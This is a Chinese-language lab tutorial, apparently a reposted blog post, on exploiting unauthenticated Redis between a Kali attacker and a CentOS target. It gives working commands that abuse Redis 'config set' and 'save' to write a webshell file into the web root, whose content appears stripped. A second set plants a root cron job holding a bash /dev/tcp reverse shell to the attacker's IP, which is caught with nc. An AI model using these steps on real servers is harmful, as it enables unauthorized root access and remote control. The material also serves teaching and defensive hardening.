Redi未授权访问的两种利用方式

前言:redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器

0x00 环境配置

1. kali(攻击机)       IP:192.168.2.100
2. Centos 7.9(靶机)      IP:192.168.2.120

0x01 搭建服务

#将windows本机提前下载好的redis压缩包传输到 Centos 7.9家目录下
scp redis-5.0.3.tar.gz [email protected]:/root/

Redi未授权访问的两种利用方式_第1张图片

#Centos上操作
[root@M1key ~]#yum -y install tar        //安装tar命令用于解压文件
[root@M1key ~]# tar -zxf redis-5.0.3.tar.gz  //解压缩redis文件
[root@M1key ~]# cd redis-5.0.3
[root@M1key redis-5.0.3]# yum -y install centos-release-scl //安装软件集合包
[root@M1key redis-5.0.3]# yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++devtoolset-9-binutils  //安装gcc
[root@M1key redis-5.0.3]# scl enable devtoolset-9 bash  //临时修改gcc版本
[root@M1key redis-5.0.3]# gcc -v    //查看gcc版本
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --enable-bootstrap --enable-languages=c,c++,fortran,lto --prefix=/opt/rh/devtoolset-9/root/usr --mandir=/opt/rh/devtoolset-9/root/usr/share/man --infodir=/opt/rh/devtoolset-9/root/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-shared --enable-threads=posix --enable-checking=release --enable-multilib --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-gcc-major-version-only --with-linker-hash-style=gnu --with-default-libstdcxx-abi=gcc4-compatible --enable-plugin --enable-initfini-array --with-isl=/builddir/build/BUILD/gcc-9.3.1-20200408/obj-x86_64-redhat-linux/isl-install --disable-libmpx --enable-gnu-indirect-function --with-tune=generic --with-arch_32=x86-64 --build=x86_64-redhat-linux
Thread model: posix
gcc version 9.3.1 20200408 (Red Hat 9.3.1-2) (GCC) 
[root@M1key redis-5.0.3]#make  //make编译,编译成功后会在src目录下生成两个可执行文件redis-server、redis-cli。

注意事项:gcc版本小于5.3编译的时候会报错

启动服务
[root@M1key redis-5.0.3]# cd src/
[root@M1key src]# ./redis-server 

Redi未授权访问的两种利用方式_第2张图片

尝试连接redis服务器
#kali操作机
root@kali:~# apt install redis-tools   //安装redis客户端
root@kali:~# redis-cli -h  192.168.2.120  //连接redis客户端,默认端口6379

Redi未授权访问的两种利用方式_第3张图片

可以看到会报错,因为redis默认开启哨兵模式,我们需要在开启redis服务的时候关闭哨兵模式。

[root@M1key src]# ./redis-server  --protected-mode no

再次连接就不会报错了

Redi未授权访问的两种利用方式_第4张图片

此时环境就准备好了,可以开始我们后续的步骤了。

0x02 写shell文件

tips:由于是上帝视角我们知道网站根目录在/var/www/html下。

192.168.2.120:6379> config set dir /var/www/html   #选网站根目录
OK
192.168.2.120:6379> config set dbfilename shell.php  #设定文件名
OK
192.168.2.120:6379> set x "\n\n\n\n"  #设置文件内容
OK
192.168.2.120:6379> save     #保存
OK

tips:在写文件内容的时候,redis有可能会在开头或者末尾添加一些banner信息,所以在设置文件内容的时候我们要进行一个换行的操作。

访问我们上传的文件:Redi未授权访问的两种利用方式_第5张图片

上传成功!

0x03 反弹shell

与写shell的原理一样,只不过我们这次写的文件在定时任务的目录下,设置时间触发一个定时任务,然后kali接收shell。Over~!

#kali操作机
192.168.2.120:6379> config set dir /var/spool/cron  # 选择定时任务的目录
OK
192.168.2.120:6379> config set dbfilename root     # 配置文件名称
OK
192.168.2.120:6379> set x "\n\n0-59 * * * * /bin/bash -i >&/dev/tcp/192.168.2.100/8888 0>&1\n\n"      # 配置文件内容
OK
192.168.2.120:6379> save
OK
# kali 另外开一个终端
root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.2.100] from (UNKNOWN) [192.168.2.120] 43652
bash: no job control in this shell
[root@M1key ~]# 

Redi未授权访问的两种利用方式_第6张图片

成功接收shell。

你可能感兴趣的:(web安全,安全,网络,网络安全)